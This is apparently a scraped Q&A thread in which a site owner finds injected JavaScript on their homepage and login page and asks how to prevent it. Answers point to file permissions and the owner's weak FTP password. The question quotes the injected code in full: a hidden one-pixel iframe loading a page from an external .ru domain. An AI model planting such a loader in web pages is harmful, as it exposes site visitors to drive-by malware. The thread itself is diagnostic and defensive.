Question
Today morning I have noticed that some Javascript has been added to my hosted site . When I downloaded the homepage the code was like
<!--04b037--><script type="text/javascript"language="javascript"> (function () { var ipexz = document.createElement('iframe'); ipexz.src = 'http://nypmivhy.ru/count5.php'; ipexz.style.position = 'absolute'; ipexz.style.border = '0'; ipexz.style.height = '1px'; ipexz.style.width = '1px'; ipexz.style.left = '1px'; ipexz.style.top = '1px'; if (!document.getElementById('ipexz')) { document.write('<div id=\'ipexz\'></div>'); document.getElementById('ipexz').appendChild(ipexz); }})();</script><!--/04b037-->
And in login page :
https://stackoverflow.com/questions/14097982
italiano
english
français
española
中国
日本の
العربية
Deutsch
한국어
Português
Russian(function () { var usyux = document.createElement('iframe'); usyux.src = 'http://nypmivhy.ru/count5.php'; usyux.style.position = 'absolute'; usyux.style.border = '0'; usyux.style.height = '1px'; usyux.style.width = '1px'; usyux.style.left = '1px'; usyux.style.top = '1px'; if (!document.getElementById('usyux')) { document.write('
'); document.getElementById('usyux').appendChild(usyux); }})();" method="post"> Email
I guess its a virus/spam attack. Though I removed the javascript code now, I want to how can I prevent my site from such attacks. NB: My FTP password is very weak.
Solution 2
Check the permissions of the file is correct otherwise it could be the code was injected.
Take a look at this:
http://ag.arizona.edu/ecat/web/permissions.html
There are 3 main permissions that you have to setup for the files:
read from the file
write to the file
execute the file
Here is a summary for permissions
OTHER TIPS
NB: My FTP password is very weak.
You know what you are doing wrong and still you ask? Fix that first, also secure your computer, and if you are using scripts, review the logs for hacking attempts and make them secure.
